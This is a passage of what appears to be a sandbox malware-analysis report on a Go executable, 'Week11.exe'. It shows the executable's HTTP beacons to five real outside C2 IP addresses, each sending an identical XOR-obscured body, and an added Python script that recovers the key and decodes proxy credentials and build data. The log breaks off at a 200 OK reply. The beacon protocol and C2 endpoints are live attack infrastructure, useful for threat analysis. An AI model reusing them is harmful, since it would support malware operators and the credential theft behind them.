                               Nov 10, 2024 16:48:51.094216108 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:51.094536066 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:48:51.101241112 CET | 80 | 49872 | 91.212.166.91 | 192.168.2.7
                               Nov 10, 2024 16:48:51.101253033 CET | 80 | 49860 | 46.8.236.61 | 192.168.2.7
                               Nov 10, 2024 16:48:51.101267099 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:48:51.101324081 CET | 49872 | 80 | 192.168.2.7 | 91.212.166.91
                               Nov 10, 2024 16:48:51.101329088 CET | 49860 | 80 | 192.168.2.7 | 46.8.236.61
                               Nov 10, 2024 16:48:51.101352930 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:48:51.102247953 CET | 80 | 49866 | 93.185.159.253 | 192.168.2.7
                               Nov 10, 2024 16:48:51.102287054 CET | 80 | 49854 | 46.8.232.106 | 192.168.2.7
                               Nov 10, 2024 16:48:51.102297068 CET | 49866 | 80 | 192.168.2.7 | 93.185.159.253
                               Nov 10, 2024 16:48:51.102355003 CET | 49854 | 80 | 192.168.2.7 | 46.8.232.106
                               Nov 10, 2024 16:48:51.133238077 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:48:51.808060884 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:48:51.808326960 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:48:51.813131094 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:06.824384928 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:06.829327106 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:11.808258057 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:11.808562040 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:11.813354015 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:21.090476990 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:49:21.095360994 CET | 80 | 49878 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:49:21.106237888 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:21.111093998 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:21.344321966 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:21.391972065 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:32.047553062 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:32.047749043 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:32.052767038 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:47.064090014 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:47.068999052 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:51.095213890 CET | 49878 | 80 | 192.168.2.7 | 188.130.206.243
                               Nov 10, 2024 16:49:51.100090981 CET | 80 | 49878 | 188.130.206.243 | 192.168.2.7
                               Nov 10, 2024 16:49:51.361166954 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:51.366077900 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:51.600106955 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:51.647985935 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:52.286365032 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:49:52.286612034 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:49:52.291557074 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:50:07.303545952 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:50:07.308449984 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:50:12.525355101 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                               Nov 10, 2024 16:50:12.525648117 CET | 49893 | 12072 | 192.168.2.7 | 185.157.213.253
                               Nov 10, 2024 16:50:12.530455112 CET | 12072 | 49893 | 185.157.213.253 | 192.168.2.7
                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.7 | 49699 | 46.8.232.106 | 80 | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Nov 10, 2024 16:48:10.071127892 CET | 334 | OUT | POST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: imeRTf84
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                               Nov 10, 2024 16:48:10.942055941 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:10 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests
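The 198-byte body above is sent unchanged in Sessions 1 to 3 as well, under three different X-Api-Key values, so whatever hides it does not depend on that header. The following is an added analysis example, not part of the Joe Sandbox report, that tests two assumptions about the body: that the plaintext is JSON text, and that it is hidden by a short repeating-key XOR. For every candidate key length, each key position is solved independently by scoring how JSON-like its column decrypts to, and the first key whose output parses as a JSON object is accepted. The ciphertext bytes are copied from the Data Raw line of Session 0; the scoring weights, the length limit and the function names are my own.

```python
"""Recover the repeating-key XOR under the 198-byte POST body and decode it.

Added analysis example; not part of the Joe Sandbox report. The ciphertext is
the Data Raw body from Session 0 (Sessions 1-3 carry the same bytes). The two
assumptions (JSON plaintext, short repeating key) are marked in the comments.
"""
import itertools
import json
import string
from typing import Dict, List, Optional, Tuple

# Copied from the report: the 198-byte request body (matches Content-Length: 198).
BODY = bytes.fromhex(
    "18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01"
    " 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08"
    " 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57"
    " 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a"
    " 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a"
    " 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22"
    " 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01"
    " 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02"
    " 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54"
    " 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a"
)

# Assumption 1: the plaintext is JSON (structural characters plus ASCII alphanumerics),
# so a decrypted byte can be scored by how JSON-like it is.
_STRUCTURAL = frozenset(b'"{}:,')
_ALNUM = frozenset((string.ascii_letters + string.digits).encode())


def score_byte(b: int) -> int:
    if b in _STRUCTURAL:
        return 4
    if b in _ALNUM:
        return 2
    if 0x20 <= b <= 0x7E:
        return 0
    return -50  # control bytes and non-ASCII: almost certainly a wrong key byte


def xor_repeat(data: bytes, key: bytes) -> bytes:
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


def key_byte_candidates(column: bytes, n: int) -> List[int]:
    """The n key bytes under which this key-phase column decrypts to the most JSON-like text, best first."""
    return sorted(range(256), key=lambda k: -sum(score_byte(c ^ k) for c in column))[:n]


def recover(ct: bytes, max_keylen: int = 12, per_phase: int = 2) -> Optional[Tuple[bytes, Dict]]:
    """Assumption 2: the key is short and repeats. For each length, solve every phase on its own,
    then accept the first combination of top candidates whose plaintext parses as a JSON object."""
    for klen in range(1, max_keylen + 1):
        options = [key_byte_candidates(ct[phase::klen], per_phase) for phase in range(klen)]
        for combo in itertools.product(*options):
            key = bytes(combo)
            try:
                obj = json.loads(xor_repeat(ct, key).decode("utf-8"))
            except ValueError:  # UnicodeDecodeError and JSONDecodeError both subclass ValueError
                continue
            if isinstance(obj, dict):
                return key, obj
    return None


if __name__ == "__main__":
    found = recover(BODY)
    if found is None:
        print("no short repeating-key XOR of a JSON object fits this body")
    else:
        key, obj = found
        print("key:", key)
        for name, value in obj.items():
            print(f"  {name}: {value}")
```

On this body the search stops at length six with the key `config` and a five-field object: userId, proxyUsername, proxyPassword, buildVersion and md5, the last of which is the sample's own hash, which is as good a confirmation of the key as one gets. Because the key is fixed rather than derived from the X-Api-Key header, the same function decodes the body of any capture of this beacon; the rate-limited 429 replies mean the report never shows what a successful registration returns.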


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.7 | 49700 | 46.8.236.61 | 80 | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Nov 10, 2024 16:48:11.032814980 CET | 333 | OUT | POST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: zmPxtJCV
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                               Nov 10, 2024 16:48:11.878170967 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:11 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               2 | 192.168.2.7 | 49701 | 93.185.159.253 | 80 | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Nov 10, 2024 16:48:11.905344009 CET | 336 | OUT | POST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: qp5sEuke
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:12.779258966 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:12 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                              3          | 192.168.2.7 | 49702       | 91.212.166.91  | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:12.807813883 CET | 335 | OUT | POST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: n9HFL5dt
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:13.719944000 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:13 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                              4          | 192.168.2.7 | 49703       | 188.130.206.243 | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:13.962546110 CET | 337 | OUT | POST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: 5tsXyW0C
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:15.247839928 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:15 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                              5          | 192.168.2.7 | 49854       | 46.8.232.106   | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:45.278079987 CET | 334 | OUT | POST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: TM5rMihx
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:46.231353045 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:46 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                              6          | 192.168.2.7 | 49860       | 46.8.236.61    | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:46.260587931 CET | 333 | OUT | POST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: 0oN7jWnU
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:47.175920963 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                              7          | 192.168.2.7 | 49866       | 93.185.159.253 | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:47.203821898 CET | 336 | OUT | POST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: fOauRxk0
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:48.065321922 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                              8          | 192.168.2.7 | 49872       | 91.212.166.91  | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:48.092874050 CET | 335 | OUT | POST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: RLinuieK
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:48.975406885 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:48 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                              9          | 192.168.2.7 | 49878       | 188.130.206.243 | 80               | 7116 | C:\Users\user\Desktop\Week11.exe.bin.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 10, 2024 16:48:49.016057968 CET | 337 | OUT | POST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: C4HDGxuS
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:51.090313911 CET | 556 | IN | HTTP/1.1 200 OK
                              Date: Sun, 10 Nov 2024 15:48:50 GMT
                              Content-Length: 438
                              Content-Type: text/plain; charset=utf-8
